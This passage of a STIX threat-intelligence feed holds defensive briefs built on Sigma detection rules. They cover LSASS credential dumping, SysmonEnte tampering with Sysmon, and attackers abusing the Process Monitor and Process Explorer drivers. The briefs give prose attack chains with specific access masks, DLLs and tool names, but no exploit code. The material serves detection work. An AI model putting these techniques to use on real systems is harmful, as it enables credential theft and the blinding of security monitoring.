          "url": "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/christophetd/status/1164506034720952320"
        },
        {
          "source_name": "reference",
          "url": "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
        },
        {
          "source_name": "reference",
          "url": "https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a8358762-2288-50e4-9c88-cb709bf53661",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--253751f9-90e1-5bc1-8141-b0038f85253d",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe18f267-ddcd-5dea-bebf-55bc19087794",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--253751f9-90e1-5bc1-8141-b0038f85253d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--253751f9-90e1-5bc1-8141-b0038f85253d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Suspicious GrantedAccess Flags on LSASS",
      "description": "## Overview\n\nThis threat brief focuses on a critical post-exploitation technique used by various adversaries: credential dumping from the Local Security Authority Subsystem Service (LSASS) process. Published by SigmaHQ, this detection rule identifies attempts to open `LSASS.exe` with specific, often excessive, `GrantedAccess` flags. While not tied to a single threat actor or campaign, this behavior is a hallmark of tools like Mimikatz, Lazagne, or custom credential dumpers. Successfully obtaining credentials from LSASS allows attackers to move laterally across a network, escalate privileges, and maintain persistence. Detection engineers should implement robust logging for process access events to identify these suspicious interactions and mitigate potential compromise. This technique is frequently observed in ransomware campaigns, espionage operations, and financially motivated attacks, making its detection vital for Windows endpoint security.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversary gains initial access to a target system via various methods (e.g., phishing, exploiting a vulnerable service, weak credentials).\n2.  **Execution**: Malicious code (e.g., malware dropper, attacker-controlled script) is executed on the compromised system.\n3.  **Privilege Escalation**: If necessary, the attacker elevates privileges to a level that allows interaction with critical system processes like LSASS.\n4.  **Process Access Attempt**: An attacker-controlled process attempts to open the `lsass.exe` process with specific, often excessive, `GrantedAccess` rights for reading its memory.\n5.  **Credential Dumping**: The attacker's process reads the memory of `LSASS` to extract sensitive authentication material, such as NTLM hashes, Kerberos tickets, or plaintext passwords.\n6.  **Lateral Movement \u0026 Impact**: Stolen credentials are used to authenticate to other systems, facilitating lateral movement within the network or enabling further actions like data exfiltration or ransomware deployment.\n\n## Impact\n\nCredential dumping from LSASS is a severe security event. If successful, attackers can obtain sensitive authentication material (e.g., NTLM hashes, Kerberos tickets) for legitimate user accounts, including administrative credentials. This enables seamless lateral movement within the network, allowing adversaries to access other systems and resources without needing to crack passwords. The impact can range from complete domain compromise to widespread data exfiltration or the deployment of ransomware across the enterprise. Organizations in all sectors are targeted by this technique, as credentials are a universal key to system access, leading to significant financial losses, data breaches, and operational disruption.\n\n## Recommendation\n\n*   Enable Sysmon Event ID 10 (ProcessAccess) logging on all Windows endpoints to capture detailed information about processes accessing other processes.\n*   Deploy the \"Detect Potentially Suspicious GrantedAccess Flags on LSASS\" Sigma rule to your SIEM/EDR platform and tune it for your environment.\n*   Review and tune the `falsepositives` section of the Sigma rule with specific exclusions for known legitimate security products (e.g., EDR, AV, PAM) that may legitimately access LSASS.\n*   Investigate all high-severity alerts generated by the \"Detect Potentially Suspicious GrantedAccess Flags on LSASS\" rule for potential credential dumping activity.\n",
      "published": "2026-07-03T14:21:55Z",
      "labels": [
        "credential-dumping",
        "windows",
        "post-exploitation"
      ],
      "object_refs": [
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights"
        },
        {
          "source_name": "reference",
          "url": "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843\u0026ithint=file%2cpptx\u0026app=PowerPoint\u0026authkey=!AMvCRTKB_V1J5ow"
        },
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment"
        },
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f0f3431-01df-530f-b45d-6a4a10e6a80b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cfd9b43d-91df-5c31-a210-036d52b72e89",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cfd9b43d-91df-5c31-a210-036d52b72e89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Credential Dumping Activity via LSASS Process Access",
      "description": "## Overview\n\nCredential dumping from the Local Security Authority Subsystem Service (LSASS) is a critical post-exploitation technique widely utilized by adversaries to steal user credentials, often leading to significant compromises including lateral movement, privilege escalation, and data exfiltration. Attackers leverage various tools, such as Mimikatz, NanoDump, Invoke-Mimikatz, or even built-in Windows utilities like Task Manager or Procdump, to access the memory of the `lsass.exe` process. This memory contains sensitive authentication data, including NTLM hashes and Kerberos tickets, which can then be used in pass-the-hash or pass-the-ticket attacks. Detecting these attempts is crucial for identifying an adversary's presence on a compromised system and preventing further progression of an attack. The technique is a staple for many threat groups, from financially motivated cybercriminals to state-sponsored APTs.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An adversary first gains initial access to a Windows system, typically through phishing, exploitation of a vulnerability, or other initial access vectors.\n2.  **Execution of Dumping Tool**: The attacker executes a credential dumping tool (e.g., `mimikatz.exe`, `NanoDump.exe`, `procdump.exe`, or a PowerShell script like `Invoke-Mimikatz`).\n3.  **Process Open Request**: The executed tool attempts to open the `lsass.exe` process to gain read access to its memory.\n4.  **Granted Access Negotiation**: The tool requests specific memory access rights to `lsass.exe` (e.g., `0x1038` for `PROCESS_VM_READ | PROCESS_QUERY_INFORMATION`).\n5.  **Memory Access and Dumping**: The tool uses specific system libraries and functions (e.g., `dbgcore.dll`, `dbghelp.dll`, `kernel32.dll`, `kernelbase.dll`, `ntdll.dll`) to access and dump the `lsass.exe` process memory.\n6.  **Credential Extraction**: Sensitive information such as NTLM hashes, Kerberos tickets, or plaintext passwords are extracted from the dumped memory.\n7.  **Post-Dumping Activity**: The adversary uses the harvested credentials for lateral movement within the network, privilege escalation, or maintaining persistence.\n\n## Impact\n\nSuccessful credential dumping from LSASS allows attackers to gain unauthorized access to other systems and services within an organization, escalating privileges and enabling widespread lateral movement. This can lead to a complete compromise of the domain, including access to sensitive data, intellectual property, or critical infrastructure. Organizations can face severe financial losses from data breaches, regulatory fines, operational disruption, and significant reputational damage. The average cost of a data breach can run into millions of dollars, with credential theft being a primary enabler of these breaches.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Potential Credential Dumping Activity Via LSASS\" to your SIEM to detect process access to `lsass.exe` with suspicious access masks and call traces.\n*   Ensure Sysmon (specifically ProcessAccess events) is configured to capture `process_access` events for the `lsass.exe` process on all critical Windows endpoints.\n*   Implement strong access controls and Least Privilege principles to limit the ability of non-administrative users and processes to open `lsass.exe` for memory read operations.\n*   Regularly review `process_access` logs for suspicious activity targeting `lsass.exe`, especially from processes that are not standard system utilities or security software.\n",
      "published": "2026-07-03T14:20:37Z",
      "labels": [
        "credential-access",
        "post-exploitation",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html"
        },
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md"
        },
        {
          "source_name": "reference",
          "url": "https://research.splunk.com/endpoint/windows_possible_credential_dumping/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8185194e-fde6-5897-85b1-6a656d9fd159",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "HackTool - SysmonEnte Execution for Sysmon Evasion",
      "description": "## Overview\n\nSysmonEnte is a publicly available hacktool designed to compromise the integrity of Microsoft's System Monitor (Sysmon), a vital endpoint telemetry agent. Developed by codewhitesec and released around September 2022, the tool specifically targets Sysmon's running processes (Sysmon.exe, Sysmon64.exe, Sysmon64a.exe) to gain control and potentially disable its logging capabilities. This enables attackers to operate stealthily on compromised Windows systems, evading detection by security tools relying on Sysmon's telemetry. The execution of SysmonEnte is a strong indicator of defense impairment, signifying an adversary's intent to blind security monitoring and conduct post-exploitation activities without leaving traces. Its presence and activity are critical for security teams to identify to prevent further compromise and maintain visibility.\n\n## Attack Chain\n\n1.  **Initial Access \u0026 Tool Deployment**: After gaining initial access, an attacker uploads or drops the `SysmonEnte.exe` executable onto the compromised Windows host, often in a non-standard or user-controlled directory to avoid typical process monitoring.\n2.  **Tool Execution**: The attacker executes `SysmonEnte.exe` from a command prompt, PowerShell, or through another compromised process.\n3.  **Sysmon Process Enumeration**: `SysmonEnte` identifies running Sysmon processes (e.g., `Sysmon.exe`, `Sysmon64.exe`, `Sysmon64a.exe`) on the system.\n4.  **Process Handle Acquisition**: `SysmonEnte` attempts to open a handle to the identified Sysmon process with specific `GrantedAccess` rights (e.g., `0x1400`), indicating an attempt to query, read, write, or terminate the process.\n5.  **Integrity Attack/Evasion**: Using the acquired handle, `SysmonEnte` performs actions that undermine Sysmon's integrity, such as disabling its logging, modifying its configuration to ignore malicious activity, or terminating the process. The presence of 'Ente' in the call trace is a specific identifier for this tool's activity.\n6.  **Reduced Visibility**: Once Sysmon's integrity is compromised, the attacker can proceed with their malicious objectives (e.g., credential dumping, lateral movement, data exfiltration) with significantly reduced or entirely absent logging by Sysmon, severely hindering detection and forensic analysis.\n\n## Impact\n\nThe successful use of SysmonEnte critically impacts an organization's ability to detect and respond to malicious activities on endpoints. By disabling or interfering with Sysmon, attackers create significant blind spots in security monitoring, preventing the collection of vital telemetry such as process creations, network connections, file modifications, and registry changes. This loss of visibility severely complicates incident response, threat hunting, and forensic investigations, potentially allowing attackers to maintain persistence, escalate privileges, exfiltrate sensitive data, or deploy ransomware without immediate detection. Organizations heavily reliant on Sysmon for endpoint telemetry face increased risk of prolonged compromise and difficulty in containing breaches.\n\n## Recommendation\n\n*   Ensure that Sysmon is deployed and configured to log `ProcessAccess` events (Event ID 10) to capture attempts to open handles to critical security processes.\n*   Deploy the `HackTool - SysmonEnte Execution` Sigma rule provided in this brief to your SIEM/EDR for real-time detection of SysmonEnte activity.\n*   Implement integrity monitoring solutions to detect unauthorized modifications or termination attempts against Sysmon services and executables.\n*   Monitor for process executions of binaries like `SysmonEnte.exe` originating from non-standard user directories or temporary folders.\n*   Review the public GitHub repository `https://github.com/codewhitesec/SysmonEnte/` for a deeper understanding of the tool's technical functionality and indicators.\n",
      "published": "2026-07-03T14:19:41Z",
      "labels": [
        "defense-evasion",
        "endpoint",
        "windows",
        "hacktool"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/codewhitesec/SysmonEnte/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7c46b9d0-e088-590a-8734-3aa395dfed0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Input Capture",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1056",
          "url": "https://attack.mitre.org/techniques/T1056"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1238e3ef-0f8c-5ca4-96fd-fe42bb58083e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dbd01be8-797d-58ee-8ab9-3dd4ea6e8282",
      "target_ref": "attack-pattern--7c46b9d0-e088-590a-8734-3aa395dfed0d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dbd01be8-797d-58ee-8ab9-3dd4ea6e8282",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious CredUI.DLL Loading by Uncommon Processes",
      "description": "## Overview\n\nThis threat brief details a detection for the suspicious loading of `credui.dll` or `wincredui.dll` by processes not commonly associated with these system libraries. `CredUI.DLL` is a legitimate Windows component responsible for displaying credential dialogs and managing credential input. Attackers frequently abuse legitimate system binaries and libraries to perform malicious actions while evading detection. By forcing an uncommon process to load `credui.dll`, an adversary can potentially leverage functions like `CredUIPromptForCredentials` or `CredUnPackAuthenticationBufferW` to capture user credentials or manipulate credential buffers directly. This technique serves as an indicator of post-exploitation activity, signaling attempts to gain access to stored credentials or prompt users for sensitive information. The detection focuses on filtering known legitimate process paths to highlight truly anomalous behavior.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to significant impact, primarily through credential access and theft. Attackers gaining control of user credentials can then perform lateral movement within the network, escalate privileges, access sensitive data, or establish persistence. This can enable further stages of an attack, such as data exfiltration, deployment of ransomware, or critical system disruption. The immediate consequence is the compromise of user accounts, potentially leading to widespread organizational impact if high-privilege credentials are obtained.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"CredUI.DLL Loaded By Uncommon Process\" to your SIEM and tune for your environment.\n*   Ensure `image_load` logging is enabled for your Windows endpoints, preferably via Sysmon, to collect the necessary telemetry for the provided Sigma rule.\n*   Investigate all alerts generated by the \"CredUI.DLL Loaded By Uncommon Process\" rule, focusing on the parent process and its command line arguments.\n",
      "published": "2026-07-03T14:18:53Z",
      "labels": [
        "windows",
        "credential-access",
        "image-load-detection"
      ],
      "object_refs": [
        "attack-pattern--7c46b9d0-e088-590a-8734-3aa395dfed0d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/S12cybersecurity/RDPCredentialStealer"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfc5f43f-acdd-5580-9ba4-4ffcf58f75bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e044fe2a-fe0e-56fc-8ce5-155de46dbe27",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f02f6390-a426-5152-bc45-94fa962ed259",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e044fe2a-fe0e-56fc-8ce5-155de46dbe27",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e044fe2a-fe0e-56fc-8ce5-155de46dbe27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Process Monitor Driver Creation by Non-Sysinternals Binary",
      "description": "## Overview\n\nThis detection brief focuses on an unusual activity where a Process Monitor driver file (typically named `procmon*.sys`) is created by a binary other than the legitimate Sysinternals Process Monitor application itself (e.g., `procmon.exe`, `procmon64.exe`). While Process Monitor legitimately creates and loads its own kernel driver to function, its creation by an unexpected process is highly suspicious. This behavior suggests a potential attempt by malicious actors to achieve privilege escalation or establish stealthy persistence by installing a rogue kernel driver. Kernel-level access grants an attacker significant control over the operating system, allowing for defense evasion, rootkit functionality, and execution of arbitrary code with SYSTEM privileges, making this a critical behavior to monitor for on Windows endpoints.\n\n## Attack Chain\n\n1.  **Initial Access**: A malicious actor gains initial access to a Windows system, typically through a common vector such as a phishing campaign, exploiting a public-facing vulnerable service, or compromising user credentials.\n2.  **Execution**: The attacker executes a malicious payload on the compromised system, often a loader or backdoor, establishing an initial foothold for further operations.\n3.  **Privilege Escalation**: To achieve higher access, the attacker leverages a local privilege escalation exploit (e.g., a vulnerability in a Windows service or kernel component) or other techniques to gain SYSTEM-level privileges.\n4.  **Driver Creation**: With elevated privileges, the attacker creates a `.sys` file (e.g., `procmon.sys` or a similarly named file) in a system directory from a process *other than* the legitimate Sysinternals Process Monitor binary (e.g., `cmd.exe`, `powershell.exe`, or a custom malicious executable).\n5.  **Driver Installation/Loading**: The attacker then installs and loads this newly created, potentially malicious driver, often by manipulating registry keys (e.g., under `HKLM\\SYSTEM\\CurrentControlSet\\Services`) or using legitimate Windows APIs, granting the attacker kernel-level control.\n6.  **Persistence/Defense Evasion**: The successfully loaded kernel driver enables the attacker to maintain stealthy persistence across reboots, evade detection by security products, or perform highly privileged actions for data exfiltration, command and control, or further system compromise.\n\n## Impact\n\nIf an attacker successfully creates and loads a malicious kernel driver through this technique, the impact can be severe. It grants them SYSTEM-level privileges and kernel-mode access, allowing them to operate with virtually unlimited control over the operating system. This can lead to complete system compromise, enabling rootkit functionality for defense evasion, persistent access that is difficult to remove, and the ability to exfiltrate sensitive data or deploy further malware undetected. This technique bypasses many user-mode security controls, posing a significant challenge for incident responders. While no specific victims or campaigns are identified, any organization running Windows systems could be targeted by actors employing such privilege escalation and persistence methods.\n\n## Recommendation\n\n*   Deploy the \"Process Monitor Driver Creation By Non-Sysinternals Binary\" Sigma rule to your SIEM for immediate detection of this suspicious activity.\n*   Ensure comprehensive file event logging, such as with Sysmon, is enabled on all Windows endpoints to capture the `TargetFilename` and `Image` paths required by the rule.\n*   Investigate all alerts generated by the \"Process Monitor Driver Creation By Non-Sysinternals Binary\" rule to determine if the driver creation is legitimate or indicative of malicious activity.\n",
      "published": "2026-07-03T14:17:56Z",
      "labels": [
        "persistence",
        "privilege-escalation",
        "windows",
        "detection"
      ],
      "object_refs": [
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7fca87d4-9400-5eb1-a08f-2ebe525e4952",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b17dd9fe-adb4-502b-9759-e9b758f193e5",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1562",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f77c68e-c962-5bc9-9d6b-af8baaee03a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b17dd9fe-adb4-502b-9759-e9b758f193e5",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1543",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb2ebc84-7e02-5f56-9d3c-a7f13538035e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b17dd9fe-adb4-502b-9759-e9b758f193e5",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1070",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2fa2dc71-f1c4-57e5-a4ca-ff8ce7604594",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b17dd9fe-adb4-502b-9759-e9b758f193e5",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b17dd9fe-adb4-502b-9759-e9b758f193e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Malware Abusing Process Explorer Driver for Privilege Escalation",
      "description": "## Overview\n\nAdversaries are leveraging a technique that involves the abuse of legitimate Sysinternals Process Explorer drivers (`PROCEXP*.sys`) to gain elevated privileges on Windows systems. This method entails dropping the driver to disk via a malicious process that is not the official Process Explorer utility itself. Once dropped, the adversary can create a service using this driver, which then allows their code to operate with system-level privileges. This technique is often short-lived, with the driver being removed shortly after privilege escalation is achieved, making detection challenging. This allows attackers to bypass security solutions like EDRs and perform actions that require high integrity, such as terminating security processes or modifying critical system configurations.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An adversary gains initial access to a Windows system through an unspecified mechanism, such as exploiting a vulnerability or via a phishing attack.\n2.  **Execution**: Malware or hack tools are executed on the compromised endpoint, initiating the malicious activity.\n3.  **Payload Dropping**: The malicious process (not `procexp.exe` or its variants) drops a legitimate Sysinternals Process Explorer driver file (e.g., `PROCEXP64.sys`) to a temporary location on the disk.\n4.  **Service Creation**: The malware programmatically creates a new Windows service, configured to load and execute the dropped `PROCEXP*.sys` driver.\n5.  **Privilege Escalation**: The newly created service is started, leveraging the signed Process Explorer driver to achieve system-level privileges, allowing the attacker to bypass user access controls and potentially EDR solutions.\n6.  **Post-Exploitation \u0026 Cleanup**: After achieving the desired objective (e.g., disabling security software, system modifications), the malware removes the dropped driver file and may delete the associated service to cover its tracks and evade forensic analysis.\n\n## Impact\n\nThe successful exploitation of this technique grants attackers system-level privileges, enabling them to completely compromise the affected Windows endpoint. This can lead to the termination or disabling of security software (such as EDR agents), exfiltration of sensitive data, deployment of ransomware, or establishment of persistent access. The impact can extend to full network compromise if the elevated privileges are used to pivot to other systems or compromise domain controllers. Specific instances have been observed where this technique contributed to EDR bypasses, allowing malware like Aukill to operate undetected.\n\n## Recommendation\n\n*   Deploy the Sigma rule 'Process Explorer Driver Creation By Non-Sysinternals Binary' to your SIEM and tune for your environment.\n*   Enable `file_event` logging (e.g., Sysmon Event ID 11 for FileCreate) on all Windows endpoints to ensure the detection rule has the necessary telemetry.\n*   Implement application whitelisting solutions to prevent unauthorized executables from running on endpoints.\n",
      "published": "2026-07-03T14:17:02Z",
      "labels": [
        "driver-abuse",
        "privilege-escalation",
        "defense-evasion",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Yaxser/Backstab"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks"
        },
        {
          "source_name": "reference",
          "url": "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--91f1613b-eb17-5555-a9fa-e0bd91d1b1e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious PROCEXP152.sys Driver Creation in Temporary Folders",
      "description": "## Overview\n\nThis threat brief focuses on the detection of the `PROCEXP152.sys` driver being created in a user's temporary application data folder (`\\AppData\\Local\\Temp\\`). While `PROCEXP152.sys` is a legitimate driver used by Sysinternals Process Explorer for process management, its deployment by other tools, such as the Kernel Driver Utility (KDU) or Ghost-In-The-Logs, within temporary directories is highly suspicious. Attackers and red teamers utilize KDU and Ghost-In-The-Logs to load vulnerable drivers like `PROCEXP152.sys` for defense evasion, specifically to impair or bypass security monitoring solutions like Sysmon and Windows Event Logging. This technique allows adversaries to hide their activities, making it harder for defenders to detect malicious processes, network connections, and file manipulations. The presence of this file in an unusual location, decoupled from its legitimate Sysinternals executable, strongly indicates potential malicious intent to compromise system visibility.\n\n## Attack Chain\n\nA full multi-stage attack chain is not described in the source material, which focuses on a specific defense evasion technique rather 